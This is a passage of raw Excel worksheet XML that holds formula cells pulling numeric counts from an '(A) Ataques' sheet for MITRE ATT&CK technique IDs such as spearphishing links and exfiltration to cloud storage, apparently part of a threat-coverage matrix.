        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$CN88,"")</f>
        <v>0</v>
      </c>
      <c r="AL88" s="4">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$CP88,"")</f>
        <v>0</v>
      </c>
      <c r="AM88" s="20">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$CQ88,"")</f>
        <v>0</v>
      </c>
      <c r="AN88" s="331">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",IF($AJ88=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO88" s="322">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$CR88,"")</f>
        <v>2</v>
      </c>
      <c r="AP88" s="322">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$CT88,"")</f>
        <v>1</v>
      </c>
      <c r="AQ88" s="4">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$CV88,"")</f>
        <v>1</v>
      </c>
      <c r="AR88" s="20">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!$CW88,"")</f>
        <v>1</v>
      </c>
      <c r="AS88" s="287">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",IF($AO88=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT88" s="288">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!CX88,"")</f>
        <v>1196</v>
      </c>
      <c r="AU88" s="392">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!CZ88,"")</f>
        <v>5</v>
      </c>
      <c r="AV88" s="4">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!DB88,"")</f>
        <v>3</v>
      </c>
      <c r="AW88" s="20">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",'(A) Ataques'!DC88,"")</f>
        <v>2</v>
      </c>
      <c r="AX88" s="331">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",IF($AT88=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY88" s="469">
        <f>'(A) Ataques'!LU88+'(A) Ataques'!MA88+'(A) Ataques'!MG88+'(A) Ataques'!MM88+'(A) Ataques'!MS88</f>
        <v>3</v>
      </c>
      <c r="AZ88" s="510">
        <f>'(A) Ataques'!LW88+'(A) Ataques'!MC88+'(A) Ataques'!MI88+'(A) Ataques'!MO88+'(A) Ataques'!MU88</f>
        <v>2</v>
      </c>
      <c r="BA88" s="471">
        <f>'(A) Ataques'!LY88+'(A) Ataques'!ME88+'(A) Ataques'!MK88+'(A) Ataques'!MQ88+'(A) Ataques'!MW88</f>
        <v>2</v>
      </c>
      <c r="BB88" s="471">
        <f>'(A) Ataques'!LQ88</f>
        <v>1</v>
      </c>
      <c r="BC88" s="331">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",IF($AY88=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD88" s="469">
        <f>IF('(A) Ataques'!$AP88&lt;&gt;"NO",'(A) Ataques'!LL88,"")</f>
        <v>3</v>
      </c>
      <c r="BE88" s="510">
        <f>IF('(A) Ataques'!$AP88&lt;&gt;"NO",'(A) Ataques'!LM88,"")</f>
        <v>2</v>
      </c>
      <c r="BF88" s="471">
        <f>IF('(A) Ataques'!$AP88&lt;&gt;"NO",'(A) Ataques'!LN88,"")</f>
        <v>2</v>
      </c>
      <c r="BG88" s="471">
        <f>IF('(A) Ataques'!$AP88&lt;&gt;"NO",'(A) Ataques'!LO88,"")</f>
        <v>0</v>
      </c>
      <c r="BH88" s="471">
        <f>IF('(A) Ataques'!$AP88&lt;&gt;"NO",'(A) Ataques'!LS88,"")</f>
        <v>1</v>
      </c>
      <c r="BI88" s="331">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",IF($BD88=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ88" s="469">
        <f>'(A) Ataques'!OL88+'(A) Ataques'!OR88+'(A) Ataques'!OX88+'(A) Ataques'!PD88+'(A) Ataques'!PJ88</f>
        <v>2</v>
      </c>
      <c r="BK88" s="510">
        <f>'(A) Ataques'!ON88+'(A) Ataques'!OT88+'(A) Ataques'!OZ88+'(A) Ataques'!PF88+'(A) Ataques'!PL88</f>
        <v>2</v>
      </c>
      <c r="BL88" s="471">
        <f>'(A) Ataques'!OP88+'(A) Ataques'!OV88+'(A) Ataques'!PB88+'(A) Ataques'!PH88+'(A) Ataques'!PN88</f>
        <v>2</v>
      </c>
      <c r="BM88" s="495">
        <f>'(A) Ataques'!OH88</f>
        <v>1</v>
      </c>
      <c r="BN88" s="331">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",IF($BJ88=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO88" s="469">
        <f>IF('(A) Ataques'!$AP88&lt;&gt;"NO",'(A) Ataques'!OC88,"")</f>
        <v>2</v>
      </c>
      <c r="BP88" s="510">
        <f>IF('(A) Ataques'!$AP88&lt;&gt;"NO",'(A) Ataques'!OD88,"")</f>
        <v>2</v>
      </c>
      <c r="BQ88" s="471">
        <f>IF('(A) Ataques'!$AP88&lt;&gt;"NO",'(A) Ataques'!OE88,"")</f>
        <v>2</v>
      </c>
      <c r="BR88" s="471">
        <f>IF('(A) Ataques'!$AP88&lt;&gt;"NO",'(A) Ataques'!OF88,"")</f>
        <v>1</v>
      </c>
      <c r="BS88" s="471">
        <f>IF('(A) Ataques'!$AP88&lt;&gt;"NO",'(A) Ataques'!OJ88,"")</f>
        <v>1</v>
      </c>
      <c r="BT88" s="331">
        <f>IF('(A) Ataques'!$AK88&lt;&gt;"NO",IF($BO88=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="89" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A89" s="79">
        <f t="shared" si="1"/>
        <v>87</v>
      </c>
      <c r="B89" s="4">
        <f>IF('(A) Ataques'!AK89&lt;&gt;"NO",'(A) Ataques'!E89,"")</f>
        <v>57</v>
      </c>
      <c r="C89" s="6" t="str">
        <f>IF('(A) Ataques'!AK89&lt;&gt;"NO",IF('(A) Ataques'!M89="","",'(A) Ataques'!M89),"")</f>
        <v>T1566.002-Spearphishing_Link</v>
      </c>
      <c r="D89" s="4" t="str">
        <f>IF('(A) Ataques'!AK89&lt;&gt;"NO",'(A) Ataques'!F89,"")</f>
        <v>T1566</v>
      </c>
      <c r="E89" s="286">
        <f>IF('(A) Ataques'!AK89&lt;&gt;"NO",'(A) Ataques'!AQ89,"")</f>
        <v>170</v>
      </c>
      <c r="F89" s="288">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!BB89,"")</f>
        <v>14</v>
      </c>
      <c r="G89" s="392">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!BD89,"")</f>
        <v>8</v>
      </c>
      <c r="H89" s="4">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!BF89,"")</f>
        <v>2</v>
      </c>
      <c r="I89" s="20">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!BG89,"")</f>
        <v>5</v>
      </c>
      <c r="J89" s="530">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",IF($F89=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K89" s="322">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$BH89,"")</f>
        <v>29</v>
      </c>
      <c r="L89" s="322">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$BJ89,"")</f>
        <v>28</v>
      </c>
      <c r="M89" s="4">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$BL89,"")</f>
        <v>6</v>
      </c>
      <c r="N89" s="20">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$BM89,"")</f>
        <v>13</v>
      </c>
      <c r="O89" s="532">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",IF($K89=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P89" s="292">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$BN89,"")</f>
        <v>43</v>
      </c>
      <c r="Q89" s="322">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$BP89,"")</f>
        <v>36</v>
      </c>
      <c r="R89" s="4">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$BR89,"")</f>
        <v>8</v>
      </c>
      <c r="S89" s="20">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$BS89,"")</f>
        <v>18</v>
      </c>
      <c r="T89" s="530">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",IF($P89=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U89" s="322">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$BT89,"")</f>
        <v>23</v>
      </c>
      <c r="V89" s="322">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$BV89,"")</f>
        <v>16</v>
      </c>
      <c r="W89" s="4">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$BX89,"")</f>
        <v>8</v>
      </c>
      <c r="X89" s="20">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$BY89,"")</f>
        <v>9</v>
      </c>
      <c r="Y89" s="532">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",IF($U89=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z89" s="288">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!BZ89,"")</f>
        <v>71</v>
      </c>
      <c r="AA89" s="392">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!CB89,"")</f>
        <v>57</v>
      </c>
      <c r="AB89" s="4">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!CD89,"")</f>
        <v>14</v>
      </c>
      <c r="AC89" s="20">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!CE89,"")</f>
        <v>29</v>
      </c>
      <c r="AD89" s="331">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",IF(Z89=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE89" s="322">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$CF89,"")</f>
        <v>94</v>
      </c>
      <c r="AF89" s="322">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$CH89,"")</f>
        <v>73</v>
      </c>
      <c r="AG89" s="4">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$CJ89,"")</f>
        <v>22</v>
      </c>
      <c r="AH89" s="20">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$CK89,"")</f>
        <v>37</v>
      </c>
      <c r="AI89" s="287">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",IF($AE89=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ89" s="292">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$CL89,"")</f>
        <v>0</v>
      </c>
      <c r="AK89" s="322">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$CN89,"")</f>
        <v>0</v>
      </c>
      <c r="AL89" s="4">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$CP89,"")</f>
        <v>0</v>
      </c>
      <c r="AM89" s="20">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$CQ89,"")</f>
        <v>0</v>
      </c>
      <c r="AN89" s="331">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",IF($AJ89=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO89" s="322">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$CR89,"")</f>
        <v>1</v>
      </c>
      <c r="AP89" s="322">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$CT89,"")</f>
        <v>1</v>
      </c>
      <c r="AQ89" s="4">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$CV89,"")</f>
        <v>1</v>
      </c>
      <c r="AR89" s="20">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!$CW89,"")</f>
        <v>1</v>
      </c>
      <c r="AS89" s="287">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",IF($AO89=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT89" s="288">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!CX89,"")</f>
        <v>44</v>
      </c>
      <c r="AU89" s="392">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!CZ89,"")</f>
        <v>37</v>
      </c>
      <c r="AV89" s="4">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!DB89,"")</f>
        <v>9</v>
      </c>
      <c r="AW89" s="20">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",'(A) Ataques'!DC89,"")</f>
        <v>18</v>
      </c>
      <c r="AX89" s="331">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",IF($AT89=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY89" s="469">
        <f>'(A) Ataques'!LU89+'(A) Ataques'!MA89+'(A) Ataques'!MG89+'(A) Ataques'!MM89+'(A) Ataques'!MS89</f>
        <v>0</v>
      </c>
      <c r="AZ89" s="510">
        <f>'(A) Ataques'!LW89+'(A) Ataques'!MC89+'(A) Ataques'!MI89+'(A) Ataques'!MO89+'(A) Ataques'!MU89</f>
        <v>0</v>
      </c>
      <c r="BA89" s="471">
        <f>'(A) Ataques'!LY89+'(A) Ataques'!ME89+'(A) Ataques'!MK89+'(A) Ataques'!MQ89+'(A) Ataques'!MW89</f>
        <v>0</v>
      </c>
      <c r="BB89" s="471">
        <f>'(A) Ataques'!LQ89</f>
        <v>0</v>
      </c>
      <c r="BC89" s="331">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",IF($AY89=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD89" s="469">
        <f>IF('(A) Ataques'!$AP89&lt;&gt;"NO",'(A) Ataques'!LL89,"")</f>
        <v>173</v>
      </c>
      <c r="BE89" s="510">
        <f>IF('(A) Ataques'!$AP89&lt;&gt;"NO",'(A) Ataques'!LM89,"")</f>
        <v>173</v>
      </c>
      <c r="BF89" s="471">
        <f>IF('(A) Ataques'!$AP89&lt;&gt;"NO",'(A) Ataques'!LN89,"")</f>
        <v>0</v>
      </c>
      <c r="BG89" s="471">
        <f>IF('(A) Ataques'!$AP89&lt;&gt;"NO",'(A) Ataques'!LO89,"")</f>
        <v>7</v>
      </c>
      <c r="BH89" s="471">
        <f>IF('(A) Ataques'!$AP89&lt;&gt;"NO",'(A) Ataques'!LS89,"")</f>
        <v>169</v>
      </c>
      <c r="BI89" s="331">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",IF($BD89=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ89" s="469">
        <f>'(A) Ataques'!OL89+'(A) Ataques'!OR89+'(A) Ataques'!OX89+'(A) Ataques'!PD89+'(A) Ataques'!PJ89</f>
        <v>1</v>
      </c>
      <c r="BK89" s="510">
        <f>'(A) Ataques'!ON89+'(A) Ataques'!OT89+'(A) Ataques'!OZ89+'(A) Ataques'!PF89+'(A) Ataques'!PL89</f>
        <v>1</v>
      </c>
      <c r="BL89" s="471">
        <f>'(A) Ataques'!OP89+'(A) Ataques'!OV89+'(A) Ataques'!PB89+'(A) Ataques'!PH89+'(A) Ataques'!PN89</f>
        <v>1</v>
      </c>
      <c r="BM89" s="495">
        <f>'(A) Ataques'!OH89</f>
        <v>1</v>
      </c>
      <c r="BN89" s="331">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",IF($BJ89=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO89" s="469">
        <f>IF('(A) Ataques'!$AP89&lt;&gt;"NO",'(A) Ataques'!OC89,"")</f>
        <v>1</v>
      </c>
      <c r="BP89" s="510">
        <f>IF('(A) Ataques'!$AP89&lt;&gt;"NO",'(A) Ataques'!OD89,"")</f>
        <v>1</v>
      </c>
      <c r="BQ89" s="471">
        <f>IF('(A) Ataques'!$AP89&lt;&gt;"NO",'(A) Ataques'!OE89,"")</f>
        <v>1</v>
      </c>
      <c r="BR89" s="471">
        <f>IF('(A) Ataques'!$AP89&lt;&gt;"NO",'(A) Ataques'!OF89,"")</f>
        <v>1</v>
      </c>
      <c r="BS89" s="471">
        <f>IF('(A) Ataques'!$AP89&lt;&gt;"NO",'(A) Ataques'!OJ89,"")</f>
        <v>1</v>
      </c>
      <c r="BT89" s="331">
        <f>IF('(A) Ataques'!$AK89&lt;&gt;"NO",IF($BO89=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="90" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A90" s="79">
        <f t="shared" si="1"/>
        <v>88</v>
      </c>
      <c r="B90" s="4">
        <f>IF('(A) Ataques'!AK90&lt;&gt;"NO",'(A) Ataques'!E90,"")</f>
        <v>58</v>
      </c>
      <c r="C90" s="6" t="str">
        <f>IF('(A) Ataques'!AK90&lt;&gt;"NO",IF('(A) Ataques'!M90="","",'(A) Ataques'!M90),"")</f>
        <v>T1567.002-Exfiltration_To_Cloud_Storage</v>
      </c>
      <c r="D90" s="4" t="str">
        <f>IF('(A) Ataques'!AK90&lt;&gt;"NO",'(A) Ataques'!F90,"")</f>
        <v>T1567</v>
      </c>
      <c r="E90" s="286">
        <f>IF('(A) Ataques'!AK90&lt;&gt;"NO",'(A) Ataques'!AQ90,"")</f>
        <v>26</v>
      </c>
      <c r="F90" s="288">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!BB90,"")</f>
        <v>5</v>
      </c>
      <c r="G90" s="392">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!BD90,"")</f>
        <v>5</v>
      </c>
      <c r="H90" s="4">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!BF90,"")</f>
        <v>3</v>
      </c>
      <c r="I90" s="20">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!BG90,"")</f>
        <v>2</v>
      </c>
      <c r="J90" s="530">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",IF($F90=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K90" s="322">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$BH90,"")</f>
        <v>0</v>
      </c>
      <c r="L90" s="322">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$BJ90,"")</f>
        <v>0</v>
      </c>
      <c r="M90" s="4">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$BL90,"")</f>
        <v>0</v>
      </c>
      <c r="N90" s="20">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$BM90,"")</f>
        <v>0</v>
      </c>
      <c r="O90" s="532">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",IF($K90=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P90" s="292">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$BN90,"")</f>
        <v>5</v>
      </c>
      <c r="Q90" s="322">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$BP90,"")</f>
        <v>5</v>
      </c>
      <c r="R90" s="4">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$BR90,"")</f>
        <v>3</v>
      </c>
      <c r="S90" s="20">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$BS90,"")</f>
        <v>2</v>
      </c>
      <c r="T90" s="530">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",IF($P90=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U90" s="322">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$BT90,"")</f>
        <v>7</v>
      </c>
      <c r="V90" s="322">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$BV90,"")</f>
        <v>7</v>
      </c>
      <c r="W90" s="4">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$BX90,"")</f>
        <v>4</v>
      </c>
      <c r="X90" s="20">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$BY90,"")</f>
        <v>2</v>
      </c>
      <c r="Y90" s="532">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",IF($U90=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z90" s="288">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!BZ90,"")</f>
        <v>12</v>
      </c>
      <c r="AA90" s="392">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!CB90,"")</f>
        <v>11</v>
      </c>
      <c r="AB90" s="4">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!CD90,"")</f>
        <v>3</v>
      </c>
      <c r="AC90" s="20">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!CE90,"")</f>
        <v>10</v>
      </c>
      <c r="AD90" s="331">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",IF(Z90=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE90" s="322">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$CF90,"")</f>
        <v>19</v>
      </c>
      <c r="AF90" s="322">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$CH90,"")</f>
        <v>18</v>
      </c>
      <c r="AG90" s="4">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$CJ90,"")</f>
        <v>7</v>
      </c>
      <c r="AH90" s="20">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$CK90,"")</f>
        <v>11</v>
      </c>
      <c r="AI90" s="287">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",IF($AE90=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ90" s="292">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$CL90,"")</f>
        <v>0</v>
      </c>
      <c r="AK90" s="322">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$CN90,"")</f>
        <v>0</v>
      </c>
      <c r="AL90" s="4">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$CP90,"")</f>
        <v>0</v>
      </c>
      <c r="AM90" s="20">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$CQ90,"")</f>
        <v>0</v>
      </c>
      <c r="AN90" s="331">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",IF($AJ90=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO90" s="322">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$CR90,"")</f>
        <v>0</v>
      </c>
      <c r="AP90" s="322">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$CT90,"")</f>
        <v>0</v>
      </c>
      <c r="AQ90" s="4">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$CV90,"")</f>
        <v>0</v>
      </c>
      <c r="AR90" s="20">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!$CW90,"")</f>
        <v>0</v>
      </c>
      <c r="AS90" s="287">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",IF($AO90=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT90" s="288">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!CX90,"")</f>
        <v>5</v>
      </c>
      <c r="AU90" s="392">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!CZ90,"")</f>
        <v>5</v>
      </c>
      <c r="AV90" s="4">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!DB90,"")</f>
        <v>3</v>
      </c>
      <c r="AW90" s="20">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",'(A) Ataques'!DC90,"")</f>
        <v>2</v>
      </c>
      <c r="AX90" s="331">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",IF($AT90=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY90" s="469">
        <f>'(A) Ataques'!LU90+'(A) Ataques'!MA90+'(A) Ataques'!MG90+'(A) Ataques'!MM90+'(A) Ataques'!MS90</f>
        <v>2</v>
      </c>
      <c r="AZ90" s="510">
        <f>'(A) Ataques'!LW90+'(A) Ataques'!MC90+'(A) Ataques'!MI90+'(A) Ataques'!MO90+'(A) Ataques'!MU90</f>
        <v>2</v>
      </c>
      <c r="BA90" s="471">
        <f>'(A) Ataques'!LY90+'(A) Ataques'!ME90+'(A) Ataques'!MK90+'(A) Ataques'!MQ90+'(A) Ataques'!MW90</f>
        <v>1</v>
      </c>
      <c r="BB90" s="471">
        <f>'(A) Ataques'!LQ90</f>
        <v>2</v>
      </c>
      <c r="BC90" s="331">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",IF($AY90=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD90" s="469">
        <f>IF('(A) Ataques'!$AP90&lt;&gt;"NO",'(A) Ataques'!LL90,"")</f>
        <v>13</v>
      </c>
      <c r="BE90" s="510">
        <f>IF('(A) Ataques'!$AP90&lt;&gt;"NO",'(A) Ataques'!LM90,"")</f>
        <v>13</v>
      </c>
      <c r="BF90" s="471">
        <f>IF('(A) Ataques'!$AP90&lt;&gt;"NO",'(A) Ataques'!LN90,"")</f>
        <v>1</v>
      </c>
      <c r="BG90" s="471">
        <f>IF('(A) Ataques'!$AP90&lt;&gt;"NO",'(A) Ataques'!LO90,"")</f>
        <v>3</v>
      </c>
      <c r="BH90" s="471">
        <f>IF('(A) Ataques'!$AP90&lt;&gt;"NO",'(A) Ataques'!LS90,"")</f>
        <v>11</v>
      </c>
      <c r="BI90" s="331">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",IF($BD90=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ90" s="469">
        <f>'(A) Ataques'!OL90+'(A) Ataques'!OR90+'(A) Ataques'!OX90+'(A) Ataques'!PD90+'(A) Ataques'!PJ90</f>
        <v>2</v>
      </c>
      <c r="BK90" s="510">
        <f>'(A) Ataques'!ON90+'(A) Ataques'!OT90+'(A) Ataques'!OZ90+'(A) Ataques'!PF90+'(A) Ataques'!PL90</f>
        <v>2</v>
      </c>
      <c r="BL90" s="471">
        <f>'(A) Ataques'!OP90+'(A) Ataques'!OV90+'(A) Ataques'!PB90+'(A) Ataques'!PH90+'(A) Ataques'!PN90</f>
        <v>1</v>
      </c>
      <c r="BM90" s="495">
        <f>'(A) Ataques'!OH90</f>
        <v>2</v>
      </c>
      <c r="BN90" s="331">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",IF($BJ90=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO90" s="469">
        <f>IF('(A) Ataques'!$AP90&lt;&gt;"NO",'(A) Ataques'!OC90,"")</f>
        <v>2</v>
      </c>
      <c r="BP90" s="510">
        <f>IF('(A) Ataques'!$AP90&lt;&gt;"NO",'(A) Ataques'!OD90,"")</f>
        <v>2</v>
      </c>
      <c r="BQ90" s="471">
        <f>IF('(A) Ataques'!$AP90&lt;&gt;"NO",'(A) Ataques'!OE90,"")</f>
        <v>1</v>
      </c>
      <c r="BR90" s="471">
        <f>IF('(A) Ataques'!$AP90&lt;&gt;"NO",'(A) Ataques'!OF90,"")</f>
        <v>1</v>
      </c>
      <c r="BS90" s="471">
        <f>IF('(A) Ataques'!$AP90&lt;&gt;"NO",'(A) Ataques'!OJ90,"")</f>
        <v>2</v>
      </c>
      <c r="BT90" s="331">
        <f>IF('(A) Ataques'!$AK90&lt;&gt;"NO",IF($BO90=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="91" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A91" s="79">
        <f t="shared" si="1"/>
        <v>89</v>
      </c>
      <c r="B91" s="4">
        <f>IF('(A) Ataques'!AK91&lt;&gt;"NO",'(A) Ataques'!E91,"")</f>
        <v>59</v>
      </c>
      <c r="C91" s="6" t="str">
